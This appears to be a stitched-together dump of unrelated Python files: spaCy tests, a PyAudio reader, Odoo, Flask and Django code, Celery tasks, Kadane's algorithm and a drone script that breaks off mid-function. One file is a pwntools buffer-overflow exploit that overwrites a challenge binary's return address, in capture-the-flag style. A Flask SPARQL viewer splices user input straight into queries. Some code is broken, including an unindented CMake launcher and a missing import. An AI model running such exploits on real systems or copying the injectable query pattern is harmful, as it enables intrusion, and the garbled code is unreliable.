    assert sentences[0].ents[0].text == "This"
    assert sentences[0].ents[0].label_ == "PRODUCT"
    assert sentences[0].ents[0].start == 0
    assert sentences[0].ents[0].end == 1
    # Second sentence
    assert len(sentences[1].ents) == 1
    assert sentences[1].ents[0].text == "another"
    assert sentences[1].ents[0].label_ == "PRODUCT"
    assert sentences[1].ents[0].start == 7
    assert sentences[1].ents[0].end == 8
    # Third sentence ents, Also tests end of sentence
    assert sentences[2].ents[0].text == "a third ."
    assert sentences[2].ents[0].label_ == "PRODUCT"
    assert sentences[2].ents[0].start == 11
    assert sentences[2].ents[0].end == 14
def test_filter_spans(doc):
    """filter_spans: de-duplicate, prefer longest, then earliest."""
    # Test filtering duplicates
    spans = [doc[1:4], doc[6:8], doc[1:4], doc[10:14]]
    filtered = filter_spans(spans)
    assert len(filtered) == 3
    assert filtered[0].start == 1 and filtered[0].end == 4
    assert filtered[1].start == 6 and filtered[1].end == 8
    assert filtered[2].start == 10 and filtered[2].end == 14
    # Test filtering overlaps with longest preference
    spans = [doc[1:4], doc[1:3], doc[5:10], doc[7:9], doc[1:4]]
    filtered = filter_spans(spans)
    assert len(filtered) == 2
    assert len(filtered[0]) == 3
    assert len(filtered[1]) == 5
    assert filtered[0].start == 1 and filtered[0].end == 4
    assert filtered[1].start == 5 and filtered[1].end == 10
    # Test filtering overlaps with earlier preference for identical length
    spans = [doc[1:4], doc[2:5], doc[5:10], doc[7:9], doc[1:4]]
    filtered = filter_spans(spans)
    assert len(filtered) == 2
    assert len(filtered[0]) == 3
    assert len(filtered[1]) == 5
    assert filtered[0].start == 1 and filtered[0].end == 4
    assert filtered[1].start == 5 and filtered[1].end == 10

def test_span_eq_hash(doc, doc_not_parsed):
    # Equality/hash require the same doc, not just the same indices.
    assert doc[0:2] == doc[0:2]
    assert doc[0:2] != doc[1:3]
    assert doc[0:2] != doc_not_parsed[0:2]
    assert hash(doc[0:2]) == hash(doc[0:2])
    assert hash(doc[0:2]) != hash(doc[1:3])
    assert hash(doc[0:2]) != hash(doc_not_parsed[0:2])

def test_span_boundaries(doc):
    # In-range indexing mirrors the doc; out-of-range raises IndexError.
    start = 1
    end = 5
    span = doc[start:end]
    for i in range(start, end):
        assert span[i - start] == doc[i]
    with pytest.raises(IndexError):
        span[-5]
    with pytest.raises(IndexError):
        span[5]

def test_sent(en_tokenizer):
    doc = en_tokenizer("Check span.sent raises error if doc is not sentencized.")
    span = doc[1:3]
    assert not span.doc.has_annotation("SENT_START")
    with pytest.raises(ValueError):
        span.sent
|
import numpy as np
import pyaudio
import time, sys, math
from collections import deque
from src.utils import *
class Stream_Reader:
    """
    The Stream_Reader continuously reads data from a selected sound source using PyAudio

    Arguments:
        device: int or None: Select which audio stream to read.
        rate: float or None: Sample rate to use. Defaults to something supported.
        updates_per_second: int: How often to record new data.

    Fixes vs. previous revision: data_capture_delays was created twice;
    stream_start had a dead first assignment; valid_low_rate used a mutable
    default argument.
    """

    def __init__(self,
                 device=None,
                 rate=None,
                 updates_per_second=1000,
                 FFT_window_size=None,
                 verbose=False):
        self.rate = rate
        self.verbose = verbose
        self.pa = pyaudio.PyAudio()

        # Placeholder window size — test_device() needs it while probing devices.
        self.update_window_n_frames = 1024
        self.data_buffer = None

        # Resolve device/rate defaults by probing the hardware.
        self.device = device
        if self.device is None:
            self.device = self.input_device()
        if self.rate is None:
            self.rate = self.valid_low_rate(self.device)

        # Non-overlapping capture windows; even length via round_up_to_even.
        self.update_window_n_frames = round_up_to_even(self.rate / updates_per_second)
        self.updates_per_second = self.rate / self.update_window_n_frames
        self.info = self.pa.get_device_info_by_index(self.device)
        self.new_data = False

        # Rolling record of per-callback capture latencies (was created twice).
        self.data_capture_delays = deque(maxlen=20)
        if self.verbose:
            self.num_data_captures = 0

        self.stream = self.pa.open(
            format=pyaudio.paInt16,
            channels=1,
            rate=self.rate,
            input=True,
            frames_per_buffer=self.update_window_n_frames,
            stream_callback=self.non_blocking_stream_read)

        print("\n##################################################################################################")
        print("\nDefaulted to using first working mic, Running on:")
        self.print_mic_info(self.device)
        print("\n##################################################################################################")
        print('Recording from %s at %d Hz\nUsing (non-overlapping) data-windows of %d samples (updating at %.2ffps)'
              % (self.info["name"], self.rate, self.update_window_n_frames, self.updates_per_second))

    def non_blocking_stream_read(self, in_data, frame_count, time_info, status):
        """PyAudio callback: push each captured window into the ring buffer."""
        if self.verbose:
            start = time.time()
        if self.data_buffer is not None:
            self.data_buffer.append_data(np.frombuffer(in_data, dtype=np.int16))
            self.new_data = True
        if self.verbose:
            self.num_data_captures += 1
            self.data_capture_delays.append(time.time() - start)
        return in_data, pyaudio.paContinue

    def stream_start(self, data_windows_to_buffer=None):
        """Allocate the ring buffer and start the (already opened) stream."""
        if data_windows_to_buffer is None:
            # By default, buffer 0.5 second of audio
            self.data_windows_to_buffer = int(self.updates_per_second / 2)
        else:
            self.data_windows_to_buffer = data_windows_to_buffer
        self.data_buffer = numpy_data_buffer(self.data_windows_to_buffer, self.update_window_n_frames)
        print("\n--🎙 -- Starting live audio stream...\n")
        self.stream.start_stream()
        self.stream_start_time = time.time()

    def terminate(self):
        """Stop and close the stream and release PyAudio."""
        print("👋 Sending stream termination command...")
        self.stream.stop_stream()
        self.stream.close()
        self.pa.terminate()

    def valid_low_rate(self, device, test_rates=(44100, 22050)):
        """Set the rate to the lowest supported audio rate."""
        for testrate in test_rates:
            if self.test_device(device, rate=testrate):
                return testrate
        # If none of the test_rates worked, try the default rate:
        self.info = self.pa.get_device_info_by_index(device)
        default_rate = int(self.info["defaultSampleRate"])
        if self.test_device(device, rate=default_rate):
            return default_rate
        print("SOMETHING'S WRONG! I can't figure out a good sample-rate for DEVICE =>", device)
        return default_rate

    def test_device(self, device, rate=None):
        """Given a device ID and a rate, return True/False if it's valid."""
        try:
            self.info = self.pa.get_device_info_by_index(device)
            if not self.info["maxInputChannels"] > 0:
                return False
            if rate is None:
                rate = int(self.info["defaultSampleRate"])
            stream = self.pa.open(
                format=pyaudio.paInt16,
                channels=1,
                input_device_index=device,
                frames_per_buffer=self.update_window_n_frames,
                rate=rate,
                input=True)
            stream.close()
            return True
        except Exception:
            # Probing failures just mean "not a usable input device".
            return False

    def input_device(self):
        """
        See which devices can be opened for microphone input.
        Return the first valid device
        """
        mics = []
        for device in range(self.pa.get_device_count()):
            if self.test_device(device):
                mics.append(device)
        if len(mics) == 0:
            print("No working microphone devices found!")
            sys.exit()
        print("Found %d working microphone device(s): " % len(mics))
        for mic in mics:
            self.print_mic_info(mic)
        return mics[0]

    def print_mic_info(self, mic):
        """Dump a device's PyAudio info dict, one key per line."""
        mic_info = self.pa.get_device_info_by_index(mic)
        print('\nMIC %s:' % (str(mic)))
        for k, v in sorted(mic_info.items()):
            print("%s: %s" % (k, v))
from pyproj import Proj
# Create an object to transform projections
p = Proj(init='epsg:3857')  # EPSG code for the web-mercator projection (g-maps)
# NOTE(review): `init=` is deprecated in pyproj >= 2 — confirm the installed
# version before changing the call form (axis order can differ).
# Convert lon/lat to web mercator and back (inverse=True)
print(p(-97.740372, 30.282642))
print(p(-10880408.440985134, 3539932.820497298, inverse=True))
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, fields, models, _
class StockQuantityHistory(models.TransientModel):
    _name = 'stock.quantity.history'
    _description = 'Stock Quantity History'

    # Selection keys are ints: 0 = current inventory (falsy), 1 = at a date.
    compute_at_date = fields.Selection([
        (0, 'Current Inventory'),
        (1, 'At a Specific Date')
    ], string="Compute", help="Choose to analyze the current inventory or from a specific date in the past.")
    date = fields.Datetime('Inventory at Date', help="Choose a date to get the inventory at that date", default=fields.Datetime.now)

    def open_table(self):
        """Open the product quantity view: historical (via `to_date` context)
        when compute_at_date is set, otherwise the current quants action."""
        self.ensure_one()
        if self.compute_at_date:
            tree_view_id = self.env.ref('stock.view_stock_product_tree').id
            form_view_id = self.env.ref('stock.product_form_view_procurement_button').id
            # We pass `to_date` in the context so that `qty_available` will be computed across
            # moves until date.
            action = {
                'type': 'ir.actions.act_window',
                'views': [(tree_view_id, 'tree'), (form_view_id, 'form')],
                'view_mode': 'tree,form',
                'name': _('Products'),
                'res_model': 'product.product',
                'domain': "[('type', '=', 'product')]",
                'context': dict(self.env.context, to_date=self.date),
            }
            return action
        else:
            # Tidy up quants before showing the current-state action.
            self.env['stock.quant']._merge_quants()
            self.env['stock.quant']._unlink_zero_quants()
            return self.env.ref('stock.quantsact').read()[0]
|
from flask import Flask, jsonify, request
from transformers import pipeline
import torch
from transformers import PreTrainedTokenizerFast
from transformers.models.bart import BartForConditionalGeneration
app = Flask(__name__)

# use summarize model (pipeline) — Hugging Face default summarization pipeline
summarizer = pipeline('summarization')
# use kobart model — fine-tuned checkpoint loaded from a local path
model = BartForConditionalGeneration.from_pretrained('../kobart_summary')
tokenizer = PreTrainedTokenizerFast.from_pretrained('gogamza/kobart-base-v1')

@app.route('/')
def hello_world():
    """Liveness-check endpoint."""
    return 'Hello World!'

@app.route('/test', methods=['GET'])
def test():
    """Static test endpoint."""
    text = "This is.... Test... Flask..."
    return text
@app.route('/summarize', methods=['GET'])
def predict():
    """Summarize ?text=... with the default pipeline model."""
    text = request.args.get("text")
    summary = summarizer(text, max_length=100, min_length=30, do_sample=False)
    return summary[0]['summary_text']

@app.route('/kobartSum', methods=['GET'])
def kobart_summarize():
    """Summarize ?text=... with the KoBART model (beam search)."""
    text = request.args.get("text")
    input_ids = tokenizer.encode(text)
    input_ids = torch.tensor(input_ids)
    input_ids = input_ids.unsqueeze(0)  # add batch dimension
    output = model.generate(input_ids, eos_token_id=1, max_length=512, num_beams=5)
    output = tokenizer.decode(output[0], skip_special_tokens=True)
    return output

if __name__ == '__main__':
    app.run()
|
# Go through all downloaded raw texts and convert them to simple text, removing punctuation, etc
import utils
import unicodedata
import os
import re
from icelandicTextList import icepahcList, sagasList, modernBookList
def parseIcelandic():
    """Convert the downloaded Icelandic corpora (IcePaHC, sagas, MIM books)
    to parsed JSON files and write an available.json author index.

    Fixes a bug where the Snorri_Sturluson branch used `==` (comparison)
    instead of `=` (assignment), leaving authorName unset or stale.
    """
    RAW_FOLDER = "../rawTexts/icelandic/"
    PARSED_FOLDER = "icelandic/"
    authors = {}
    allBooks = []
    numTexts = 0
    available = []
    allNames = []

    def registerWork(authorName, workName):
        """Record a work under its author; return the parsed-file location."""
        newLocation = "%s%s-%s.json" % (PARSED_FOLDER, authorName, workName)
        workObject = {"name": workName, "location": "texts/" + newLocation}
        if authorName in authors:
            authors[authorName]["works"].append(workObject)
        else:
            authors[authorName] = {"author": authorName, "works": [workObject]}
        return newLocation

    def convertAndStore(textObj, newLocation):
        """Convert one text, accumulate its raw books, write the JSON."""
        res = textObj.convert()
        allBooks.extend(res["booksRaw"])
        utils.safeWrite(newLocation, res, True)

    # ==========================================================================
    # get texts from icepahc
    icepahcFolder = RAW_FOLDER + "icepahc-v0.9/txt/"
    for text in icepahcList:
        numTexts += 1
        authorName = text["author"]
        workName = text["title"]
        textName = text["id"] + ".txt"
        allNames.append(workName)
        newLocation = registerWork(authorName, workName)
        convertAndStore(utils.IcepahcText(authorName, workName, icepahcFolder + textName), newLocation)

    # ==========================================================================
    # get texts from sagas
    sagasFolder = RAW_FOLDER + "textar/fornritin/xml/"
    for text in sagasList:
        numTexts += 1
        if text["id"] == "F1E":
            # BUG FIX: was `authorName == "Snorri_Sturluson"` (no-op comparison)
            authorName = "Snorri_Sturluson"
        else:
            authorName = "Anon_" + text["id"]
        workName = text["title"].strip().replace(" ", "_")
        allNames.append(workName + "#" + text["id"])
        newLocation = registerWork(authorName, workName)
        convertAndStore(utils.SagasText(authorName, workName, sagasFolder + text["id"] + ".xml"), newLocation)

    # ==========================================================================
    # get books from MIM corpus
    modernBooksFolder = RAW_FOLDER + "MIM/baekur/"
    for text in modernBookList:
        numTexts += 1
        authorName = text["author"].strip().replace(" ", "_")
        workName = text["title"].strip().replace(" ", "_")
        allNames.append(workName + "#" + text["id"])
        newLocation = registerWork(authorName, workName)
        # MIM texts are in the same format as Saga texts so this works fine.
        convertAndStore(utils.SagasText(authorName, workName, modernBooksFolder + text["id"] + ".xml"), newLocation)

    for author in authors:
        available.append(authors[author])
    utils.safeWrite(PARSED_FOLDER + "available.json", available, True)
    print("Done.")

    # Optionally count the characters in the corpus. This is done to find weird
    # Unicode artifacts to make sure it gets removed in the cleaning step.
    countChars = False  # True#
    if countChars:
        print("Counting Chars")
        chars = {}
        for b in allBooks:
            bookText = b["bookText"]
            for char in bookText:
                chars[char] = True
        sortedChars = sorted(list(chars.keys()))
        for c in sortedChars:
            utils.printUnicodeChar(c)
        print("======")
        # If true, show the set of unique characters when things are decomposed
        if False:
            decomposedChars = {}
            for c in sortedChars:
                res = utils.fullyDecomposeUnicodeChar(c)
                for newC in res:
                    decomposedChars[newC] = True
            sortedDecompChars = sorted(list(decomposedChars.keys()))
            for c in sortedDecompChars:
                utils.printUnicodeChar(c)

if __name__ == "__main__":
    parseIcelandic()
|
import platform
import subprocess
if __name__ == "__main__":
print("Running CMake...")
if platform.system() == "Windows":
subprocess.call("cmake -B build -G \"Visual Studio 16 2019\"")
elif platform.system() == "Darwin":
subprocess.call("cmake -B build -G Xcode", shell=True)
print("CMake finished.")
|
#!/usr/bin/env python3
from pwn import *
PATH = './challenge'

def get_offset():
    """Crash the target with a de Bruijn pattern and recover the offset of
    the saved return address from the leaked '[check]' pointer."""
    p = process(PATH)
    c = cyclic(50000)
    p.sendline(c)
    p.recvuntil('[check] 0x')
    check = p.recvline().strip()
    sequence = unhex(check)  # extract cyclic from hex ptr
    # NOTE(review): comment says "from big to little" but endian='big' is
    # passed — presumably the leak prints bytes in big-endian order; confirm.
    little_endian = u32(sequence, endian='big')  # from big to little
    return cyclic_find(little_endian)  # find offset

offset = get_offset()
p = process(PATH)
# Pad up to the return address, then overwrite it with 0xdeadbeef.
p.sendline(b'A' * offset + pack(0xdeadbeef))
p.recvuntil('[check]')
print(p.recvall())
|
from flask import render_template, request, redirect, url_for, current_app
from pprint import pprint
from SPARQLWrapper import SPARQLWrapper, JSON
from rdflib import Graph, plugin, URIRef, Literal
from rdflib.parser import Parser
from rdflib.serializer import Serializer
import json
import re
from . import main
@main.route('/index.html', methods=['GET', 'POST'])
@main.route('/viewer.html', methods=['GET', 'POST'])
@main.route('/viewer', methods=['GET', 'POST'])
@main.route('/', methods=['GET', 'POST'])
def all_worksets():
    """List all worksets for the requesting user (falls back to the demo user)."""
    user = request.args.get('user', '') or '"Demo user"'
    # The user value is spliced into the SPARQL query as a BIND clause.
    worksets = select_worksets(specific_user = "BIND({0} as ?username)".format(user))
    return render_template("viewer.html", worksets = worksets, user = user)

@main.route('/view_workset', methods=['GET'])
def detail_workset():
    """Show the detail page for a single workset identified by ?uri=..."""
    workseturi = request.args.get('uri', '')
    ws = "BIND(<{0}> as ?workset) .".format(workseturi)
    workset = select_worksets(ws)
    return render_template("workset.html", worksets=workset)
def select_worksets(specific_workset="", specific_user=""):
    """Query the SPARQL endpoint for worksets and their member works.

    specific_workset / specific_user are SPARQL fragments spliced into the
    stored query to narrow the selection. Returns a dict keyed by workset
    URI ({} if the endpoint query fails), with each workset's works sorted
    by (author, title).
    """
    app = current_app._get_current_object()
    sparql = SPARQLWrapper(endpoint=app.config["ENDPOINT"])
    sparql.setCredentials(user=app.config["SPARQLUSER"], passwd=app.config["SPARQLPASSWORD"])
    selectWorksetsQuery = open(app.config["ELEPHANT_QUERY_DIR"] + "select_worksets.rq").read()
    sparql.setQuery(selectWorksetsQuery.format(specific_workset, specific_user))
    sparql.setReturnFormat(JSON)
    try:
        results = sparql.query().convert()
    except Exception:
        # Was a bare `except:` — that also swallowed SystemExit/KeyboardInterrupt.
        return {}
    worksets = dict()
    for result in results["results"]["bindings"]:
        workset_uri = result["workset"]["value"]
        if workset_uri not in worksets:
            worksets[workset_uri] = {
                "uri": workset_uri,
                "mod_date": result["mod_date"]["value"],
                "title": result["title"]["value"],
                "abstract": result["abstract"]["value"],
                "user": result["username"]["value"],
                "works": list()
            }
        if (result["saltset"]["value"] == "http://eeboo.oerc.ox.ac.uk/saltsets/htrc-wcsa_works"):
            saltset = "htrc-wcsa_works"
        else:
            saltset = "eeboo_works"
        try:
            worksets[workset_uri]["works"].append(
                {
                    "uri": result["work"]["value"],
                    "worktitle": result["worktitle"]["value"],
                    "author": result["author"]["value"],
                    "creator": result["creator"]["value"],
                    "pubdate": result["pubdate"]["value"].replace("-01-01", ""),  # FIXME
                    "datePrecision": result["datePrecision"]["value"],
                    "place": result["place"]["value"],
                    # "imprint": result["imprint"]["value"],
                    "elecLoc": result["elecLoc"]["value"],
                    "viaf": result["viaf"]["value"],
                    "loc": result["loc"]["value"],
                    "saltset": saltset
                })
        except Exception:
            # FIXME unicode issue — skip works whose bindings are missing/undecodable
            pass
    for workset in worksets:
        worksets[workset]["works"] = sorted(worksets[workset]["works"], key=lambda k: (k["author"], k["worktitle"]))
    return worksets
@main.route('/construct.html', methods = ['GET', 'POST'])
@main.route('/construct', methods = ['GET', 'POST'])
def construct_workset():
    """Render the workset-construction page with person, place, subject and
    genre pick-lists pulled from the SPARQL endpoint.

    Refactors four copies of the query boilerplate into one helper; the
    helper also sets the return format on every query (previously it was
    only set before the first one).
    """
    app = current_app._get_current_object()
    sparql = SPARQLWrapper(app.config["ENDPOINT"])
    sparql.setCredentials(user=app.config["SPARQLUSER"], passwd=app.config["SPARQLPASSWORD"])
    query_dir = app.config["ELEPHANT_QUERY_DIR"]

    def _bindings(query_file):
        """Run a stored SPARQL query and return its result bindings."""
        sparql.setQuery(open(query_dir + query_file).read())
        sparql.setReturnFormat(JSON)
        return sparql.query().convert()["results"]["bindings"]

    # All eeboo persons plus all HTRC persons who are NOT aligned to eeboo persons
    persons = [{"uri": p["uri"]["value"], "label": p["label"]["value"]}
               for p in _bindings("select_persons.rq")]
    # All place names, distinct among both datasets
    places = [p["place"]["value"] for p in _bindings("select_places.rq")]
    # All subject strings in HTRC (embedded newlines stripped)
    subjects = [p["subject"]["value"].replace("\n", "") for p in _bindings("select_subjects.rq")]
    # All genre strings in HTRC
    genres = [p["genre"]["value"] for p in _bindings("select_genres.rq")]
    return render_template("construct.html", persons=persons, places=places, subjects=subjects, genres=genres)
|
# Generated by Django 3.2.7 on 2022-01-10 12:12
from django.db import migrations
class Migration(migrations.Migration):
    # Renames Business.neighbourhood -> neighborhood (US spelling) to match
    # the current model field. Applied migrations must not be edited further.

    dependencies = [
        ('hood', '0006_business'),
    ]

    operations = [
        migrations.RenameField(
            model_name='business',
            old_name='neighbourhood',
            new_name='neighborhood',
        ),
    ]
|
### Chaining: indexing into nested dicts and lists
F = {'nombre': {'primero': 'Juan', 'segundo': 'Marcelo'}, 'trabajo': ['profesor', 'ingeniero']}
print(F)
print('nombre')
# Two-level dict access: outer key, then inner key.
print(F['nombre']['primero'])
print(F['nombre']['segundo'])
# List-valued entry: index by position.
print(F['trabajo'])
print(F['trabajo'][0])
print(F['trabajo'][1])
# Mutate the nested list in place.
F['trabajo'].append('pintor')
print(F)
print(F['trabajo'][2])
input()  # keep the console window open until Enter is pressed
# -*- coding: utf-8 -*-
"""Largest Continuous Sum.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1oYbOWHDKKRyP3AkhohaVPQ1lHngeLMZF
"""
def large_cont_sum(arr):
    """
    Return the largest sum of any contiguous subarray of arr (Kadane's
    algorithm).

    :param arr: list of numbers (may contain negatives)
    :return: maximum contiguous-subarray sum; 0 for an empty list
    """
    if len(arr) == 0:
        return 0
    # current_sum = best sum of a subarray ending at the current element.
    # Fix: the original reset the running sum to 0 when it went negative,
    # which returns a wrong answer for all-negative arrays; restarting at
    # the current element (max(current_sum + n, n)) is correct.
    current_sum = largest_sum = arr[0]
    for n in arr[1:]:
        current_sum = max(current_sum + n, n)
        largest_sum = max(largest_sum, current_sum)
    return largest_sum

large_cont_sum([1,2,-1,3,4,10,10,-10,-1])
# best solution
def large_cont_sum2(arr):
    """
    Largest contiguous-subarray sum (Kadane's algorithm, O(n)/O(1)).

    Returns 0 for an empty input.
    """
    if len(arr) == 0:
        return 0
    best = running = arr[0]
    for value in arr[1:]:
        # Either extend the running subarray or restart at this element.
        running = running + value if running + value > value else value
        if running > best:
            best = running
    return best

large_cont_sum2([1,2,-1,3,4,10,10,-10,-1])
# pip install nose
# test cases
from nose.tools import assert_equal
class LargeContTest(object):
    """Smoke tests for a max-contiguous-sum implementation."""

    def test(self, sol):
        """
        Run `sol` against known inputs; raises AssertionError on a wrong
        result and prints a confirmation on success.

        Uses plain asserts instead of nose.tools.assert_equal: nose is
        unmaintained and no longer imports on modern Python.
        """
        assert sol([1, 2, -1, 3, 4, -1]) == 9
        assert sol([1, 2, -1, 3, 4, 10, 10, -10, -1]) == 29
        assert sol([-1, 1]) == 1
        print('ALL TEST CASES PASSED')
# Execute the smoke tests against the optimal implementation.
suite = LargeContTest()
suite.test(large_cont_sum2)
from datetime import datetime
from celery import shared_task
from django.db import connections
from scripts.helpers import ordered_query_iterator
from capdb.models import *
def sync_case_body_cache_for_all_vols():
    """
    Queue a sync_case_body_cache_for_vol celery task for every volume
    that has xml_metadata.
    """
    volume_ids = VolumeMetadata.objects.exclude(xml_metadata=None).values_list('pk', flat=True)
    for pk in volume_ids:
        sync_case_body_cache_for_vol.delay(pk)
@shared_task
def sync_case_body_cache_for_vol(volume_id):
    """
    Rebuild the cached case body for every case in one volume.

    Page structures, blocks, fonts and block labels are fetched once and
    shared across all cases in the volume to avoid per-case queries.
    """
    vol = VolumeMetadata.objects.get(pk=volume_id)
    page_structs = list(vol.page_structures.all())
    blocks = PageStructure.blocks_by_id(page_structs)
    fonts = CaseFont.fonts_by_id(blocks)
    labels = PageStructure.labels_by_block_id(page_structs)
    for case in vol.case_metadatas.select_related('structure'):
        case.sync_case_body_cache(blocks, fonts, labels)
def create_case_metadata_from_all_vols(update_existing=False):
    """
    Launch a create_case_metadata_from_vol celery task per volume.

    When update_existing is False, only volumes that still contain
    unindexed cases are queued.
    """
    volumes = VolumeXML.objects.all()
    if not update_existing:
        # restrict to volumes with at least one case lacking metadata
        volumes = volumes.filter(case_xmls__metadata_id=None).distinct()
    for pk in volumes.values_list('pk', flat=True):
        create_case_metadata_from_vol.delay(pk, update_existing=update_existing)
@shared_task
def create_case_metadata_from_vol(volume_id, update_existing=False):
    """
    Create (or, when update_existing is set, refresh) CaseMetadata for
    every CaseXML in the given volume.
    """
    candidates = (CaseXML.objects
                  .filter(volume_id=volume_id)
                  .select_related('metadata', 'volume__metadata__reporter')
                  .defer('orig_xml', 'volume__orig_xml'))
    if not update_existing:
        # skip cases whose metadata already exists
        candidates = candidates.filter(metadata_id=None)
    for case_xml in candidates:
        case_xml.create_or_update_metadata(update_existing=update_existing)
@shared_task
def update_volume_metadata(volume_xml_id):
    """Celery task: refresh the metadata of one VolumeXML record."""
    volume_xml = VolumeXML.objects.get(pk=volume_xml_id)
    volume_xml.update_metadata()
@shared_task
def test_slow(i, ram=10, cpu=30):
    """
    Allocate `ram` megabytes of ram and run `cpu` million additions.

    Diagnostic task for exercising workers under memory and CPU load.
    """
    print("Task %s" % i)
    # Hold roughly `ram` MB to create memory pressure.
    memory_hog = bytearray(2 ** 20 * ram)  # noqa
    # Burn CPU with a simple accumulation loop.
    acc = 0
    for step in range(cpu * 1000000):
        acc += step
@shared_task
@transaction.atomic
def fix_md5_column(volume_id):
    """
    Our database has xml fields in the casexml and pagexml tables that are missing the <?xml> declaration, and that also don't have the md5 column filled.
    Here we update all the xml fields to add the <?xml> declaration and md5 hash.
    """
    with connections['capdb'].cursor() as cursor:
        # Postgres E'...' escaped-string literal that prepends the XML
        # declaration to the stored document; '' is an escaped single quote.
        new_xml_sql = "E'<?xml version=''1.0'' encoding=''utf-8''?>\n' || orig_xml"
        # Table names come from a fixed tuple, so %-interpolating them into
        # the SQL is safe here; %%s survives as a %s placeholder that the
        # driver binds to volume_id.
        for table in ('capdb_casexml', 'capdb_pagexml'):
            print("Volume %s: updating %s" % (volume_id, table))
            update_sql = "UPDATE %(table)s SET orig_xml=xmlparse(CONTENT %(new_xml)s), md5=md5(%(new_xml)s) where volume_id = %%s and md5 is null" % {'table':table, 'new_xml':new_xml_sql}
            cursor.execute(update_sql, [volume_id])
@shared_task
def get_reporter_count_for_jur(jurisdiction_id):
    """
    Count reporters through the years per jurisdiction. Include totals.

    Returns a dict with:
        total    -- total number of reporters for the jurisdiction
        years    -- {start_year: number of reporters starting that year}
        firsts   -- name/id of the earliest reporter (empty strings if none)
        recorded -- timestamp string of this computation
    """
    if not jurisdiction_id:
        print('Must provide jurisdiction id')
        return
    with connections['capdb'].cursor() as cursor:
        # Bind jurisdiction_id through the driver instead of %-interpolating
        # it into the SQL string (avoids SQL injection / quoting bugs).
        cursor.execute(
            "select r.id, r.start_year, r.full_name, r.volume_count "
            "from capdb_reporter r "
            "join capdb_reporter_jurisdictions j on (r.id = j.reporter_id) "
            "where j.jurisdiction_id=%s order by r.start_year;",
            [jurisdiction_id])
        db_results = cursor.fetchall()
    results = {
        'total': 0,
        'years': {},
        'firsts': {
            'name': '',
            'id': ''
        }
    }
    try:
        # rows are ordered by start_year, so row 0 is the earliest reporter
        results['firsts']['name'] = db_results[0][2]
        results['firsts']['id'] = db_results[0][0]
    except IndexError:
        # no reporters for this jurisdiction; keep placeholder firsts
        pass
    for rep_id, start_year, full_name, volume_count in db_results:
        # Bug fix: the original tested `start_year in results` (the outer
        # dict, whose keys are 'total'/'years'/'firsts'), so every year's
        # count was reset to 1; test membership in results['years'].
        if start_year in results['years']:
            results['years'][start_year] += 1
        else:
            results['years'][start_year] = 1
        results['total'] += 1
    results['recorded'] = str(datetime.now())
    return results
@shared_task
def get_case_count_for_jur(jurisdiction_id):
    """
    Count non-duplicative cases per decision year for a jurisdiction.

    Returns a dict with:
        total    -- total number of cases
        years    -- {decision_year: case count}
        firsts   -- name/name_abbreviation/id of the earliest case
        recorded -- timestamp string of this computation
    """
    if not jurisdiction_id:
        print('Must provide jurisdiction id')
        return
    with connections['capdb'].cursor() as cursor:
        # Parameterized query instead of %-string interpolation
        # (avoids SQL injection / quoting bugs).
        cursor.execute(
            "select extract(year from decision_date)::integer as case_year, count(*) "
            "from capdb_casemetadata "
            "where duplicative=false and jurisdiction_id=%s group by case_year;",
            [jurisdiction_id])
        db_results = cursor.fetchall()
    results = {
        'total': 0,
        'years': {},
        'firsts': {
            'name_abbreviation': '',
            'name': '',
            'id': ''
        }
    }
    first_case = CaseMetadata.objects.filter(jurisdiction_id=jurisdiction_id).order_by('decision_date').first()
    if first_case:
        results['firsts']['name_abbreviation'] = first_case.name_abbreviation
        results['firsts']['name'] = first_case.name
        results['firsts']['id'] = first_case.id
    for case_year, count in db_results:
        results['years'][case_year] = count
        results['total'] += count
    results['recorded'] = str(datetime.now())
    return results
@shared_task
def get_court_count_for_jur(jurisdiction_id):
    """Return {'recorded': timestamp, 'total': court count} for a jurisdiction."""
    if not jurisdiction_id:
        print("Must provide jurisdiction id")
        return
    jurisdiction = Jurisdiction.objects.get(id=jurisdiction_id)
    return {
        'recorded': str(datetime.now()),
        'total': jurisdiction.courts.count(),
    }
def create_case_text_for_all_cases(update_existing=False):
    """Queue a create_case_text celery task for every volume."""
    for pk in VolumeMetadata.objects.all().values_list('pk', flat=True):
        create_case_text.delay(pk, update_existing=update_existing)
@shared_task
def create_case_text(volume_id, update_existing=False):
    """
    Create (or, when update_existing is set, refresh) CaseText rows for
    every in-scope case in the given volume.
    """
    case_query = (CaseMetadata.objects
                  .in_scope()
                  .order_by('id')
                  .filter(volume_id=volume_id)
                  .select_related('case_xml', 'case_text'))
    if not update_existing:
        # only process cases that do not yet have case_text
        case_query = case_query.filter(case_text=None)
    for case in ordered_query_iterator(case_query):
        case.create_or_update_case_text()
|
#!/usr/bin/python
"""
Field Robot Event 2014 (ver0 - autonomous landing on heliport sign)
usage:
./fre_drone.py <task>
"""
import sys
import datetime
import multiprocessing
import cv2
import math
import numpy as np
from pave import PaVE, isIFrame, frameNumber, timestamp, correctTimePeriod, frameEncodedWidth, frameEncodedHeight
from sourcelogger import SourceLogger
from ardrone2 import ARDrone2, ManualControlException, manualControl, normalizeAnglePIPI, distance
import viewlog
from line import Line
from pose import Pose
from green import processAvoidGreen
import cvideo
#from rr_drone import downloadOldVideo
# Cap on commanded forward speed (units per the ARDrone2 API -- presumably
# normalized tilt/speed fraction; confirm against ardrone2 module).
MAX_ALLOWED_SPEED = 0.8
# Expected crop-row width used to scale vision detections to meters
# (presumably meters -- TODO confirm).
ROW_WIDTH = 0.75 #0.4
###### -------------------- ready for major refactoring -------------------------
def timeName( prefix, ext ):
    """Return a log-file name: prefix + current 'YYMMDD_HHMMSS.' stamp + ext."""
    now = datetime.datetime.now()
    return prefix + now.strftime("%y%m%d_%H%M%S.") + ext
g_pave = None  # lazily-created PaVE stream parser (lives in the video child process)
g_img = None   # reusable decoded-frame buffer, numpy (h, w, 3) uint8
def wrapper( packet ):
    """Feed one raw video packet to the PaVE parser; decode I-frames and run
    the green-row detector. Returns ((frameNumber, timestamp), result) for
    the first decoded frame, or None if nothing was decoded."""
    global g_pave
    global g_img
    # first call in this process: create parser, init decoder, alloc buffer
    if g_pave == None:
        g_pave = PaVE()
        cvideo.init()
        g_img = np.zeros([360,640,3], dtype=np.uint8)
    g_pave.append( packet )
    header,payload = g_pave.extract()
    while payload:
        # only standalone I-frames are decoded; other frames are skipped
        if isIFrame( header ):
            w,h = frameEncodedWidth(header), frameEncodedHeight(header)
            # reallocate the buffer if the stream resolution changed
